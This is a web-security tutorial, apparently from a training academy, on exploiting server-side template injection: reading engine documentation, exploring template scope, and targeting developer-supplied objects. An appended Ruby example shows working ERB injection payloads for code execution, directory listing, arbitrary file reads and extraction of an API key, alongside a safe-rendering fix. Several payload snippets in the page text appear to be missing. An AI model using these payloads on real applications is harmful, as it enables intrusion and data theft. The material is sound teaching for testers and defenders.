Exploiting server-side template injection vulnerabilities

In this section, we'll look more closely at some typical server-side template injection vulnerabilities and demonstrate how they can be exploited using our high-level methodology. By putting this process into practice, you can potentially discover and exploit a variety of different server-side template injection vulnerabilities.

Once you discover a server-side template injection vulnerability and identify the template engine being used, successful exploitation typically involves the following process.

Unless you already know the template engine inside out, reading its documentation is usually the first place to start. While this may not be the most exciting way to spend your time, it is important not to underestimate what a useful source of information the documentation can be.

Learning the basic syntax is obviously important, along with the key functions and the way variables are handled. Even something as simple as learning how to embed native code blocks in the template can sometimes quickly lead to an exploit. For example, once you know that the Python-based Mako template engine is being used, achieving remote code execution could be as simple as:

In an unsandboxed environment, achieving remote code execution and using it to read, edit, or delete arbitrary files is similarly simple in many common template engines.

PRACTITIONER lab: Basic server-side template injection (code context)

Read about the security implications

In addition to providing the fundamentals of how to create and use templates, the documentation may also provide some sort of "Security" section. The name of this section will vary, but it will usually outline all the potentially dangerous things that people should avoid doing with the template. This can be an invaluable resource, even acting as a kind of cheat sheet for which behaviors you should look for during auditing, as well as how to exploit them.

Even if there is no dedicated "Security" section, if a particular built-in object or function can pose a security risk, there is almost always a warning of some kind in the documentation. The warning may not provide much detail, but at the very least it should flag that particular built-in as something to investigate.

For example, in ERB, the documentation reveals that you can list all directories and then read arbitrary files as follows:

PRACTITIONER lab: Server-side template injection in an unknown language with a documented exploit

Explore

At this point, you might have already stumbled across a workable exploit using the documentation. If not, the next step is to explore the environment and try to discover all the objects to which you have access.

Many template engines expose a "self" or "environment" object of some kind, which acts like a namespace containing all objects, methods, and attributes that are supported by the template engine. If such an object exists, you can potentially use it to generate a list of the objects that are in scope. For example, in Java-based templating languages, you can sometimes list all variables in the environment using the following injection:

This can form the basis for a shortlist of potentially interesting objects and methods to investigate further. Additionally, for Burp Suite Professional users, Burp Intruder provides a built-in wordlist for brute-forcing variable names.

It is important to note that websites will contain both built-in objects provided by the template engine and custom, site-specific objects that have been supplied by the web developer. You should pay particular attention to these non-standard objects because they are especially likely to contain sensitive information or exploitable methods. As these objects can vary between different templates within the same website, be aware that you might need to study an object's behavior in the context of each distinct template before you find a way to exploit it.
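The whole process above (confirm the injection, apply what the documentation reveals, explore the environment, then pull data out of a developer-supplied object) worked through in Ruby's standard-library ERB engine, as an added example that is not code from this page or from any of its labs. `Page`, `Account`, the `api_key` value and the `secret.txt` file are constructed for the example; the `Dir.entries` and `File.open(...).read` primitives are ordinary Ruby that any ERB tag can call, which is exactly the point the ERB documentation makes.

```ruby
require 'erb'
require 'tmpdir'

# Added example; not code from the PortSwigger page or from any real site.
# Page, Account, the API key and the file contents are all constructed here.

# A site-specific object a developer hands to the template.
class Account
  attr_reader :username, :api_key

  def initialize(username, api_key)
    @username = username
    @api_key = api_key
  end
end

class Page
  def initialize(account)
    @account = account # developer-supplied object, visible to the template
  end

  # Vulnerable: user input is concatenated into the template *source*, so
  # ERB parses and executes any <% %> / <%= %> tags the input contains.
  def render_vulnerable(name)
    ERB.new("Hello " + name + "!").result(binding)
  end

  # Safe: the template source is fixed; the input only ever arrives as the
  # value of a variable, so ERB never parses it.
  def render_safe(name)
    ERB.new("Hello <%= name %>!").result(binding)
  end
end

SECRET = "sk_constructed_0000" # constructed secret for the example

def build_page
  Page.new(Account.new("alice", SECRET))
end

# Step 1 - confirm injection: an engine that evaluates 7*7 is executing our
# input as template code rather than printing it as data.
def probe(page)
  page.render_vulnerable("<%= 7*7 %>")
end

# Step 2 - apply what the documentation says. ERB tags run plain Ruby, so the
# standard Dir and File classes give directory listing and file read.
def list_dir(page, dir)
  page.render_vulnerable("<%= Dir.entries('#{dir}').sort.join(',') %>")
end

def read_file(page, path)
  page.render_vulnerable("<%= File.open('#{path}').read %>")
end

# Step 3 - explore: in ERB, `self` inside the template is the object whose
# binding was passed to result(), so its class, instance variables and
# methods reveal the objects the developer put in scope.
def explore(page)
  page.render_vulnerable(
    "<%= self.class %>|" \
    "<%= instance_variables.join(',') %>|" \
    "<%= self.class.instance_methods(false).sort.join(',') %>"
  )
end

# Step 4 - read the developer-supplied object discovered in step 3.
def steal(page)
  page.render_vulnerable("<%= @account.api_key %>")
end

if __FILE__ == $0
  page = build_page
  puts probe(page)                     # Hello 49!
  puts page.render_safe("<%= 7*7 %>")  # Hello <%= 7*7 %>!
  puts explore(page)                   # Hello Page|@account|render_safe,render_vulnerable!
  puts steal(page)                     # Hello sk_constructed_0000!
  Dir.mktmpdir do |dir|
    File.write(File.join(dir, "secret.txt"), "top-secret")
    puts list_dir(page, dir)                           # Hello .,..,secret.txt!
    puts read_file(page, File.join(dir, "secret.txt")) # Hello top-secret!
  end
end
```

Two things to take from the block. First, the fix is not escaping or filtering: `render_safe` is safe because the attacker's string never becomes template source, so the only durable defence is to keep user input out of the template text and pass it in as a variable (and, where user-editable templates are a feature, to render them in a sandboxed engine). Second, the `explore` payload is the ERB equivalent of the "self" or "environment" object described above: once you know what `self` is inside the template, `instance_variables` and `instance_methods` enumerate exactly the non-standard, developer-supplied objects that the page tells you to prioritise.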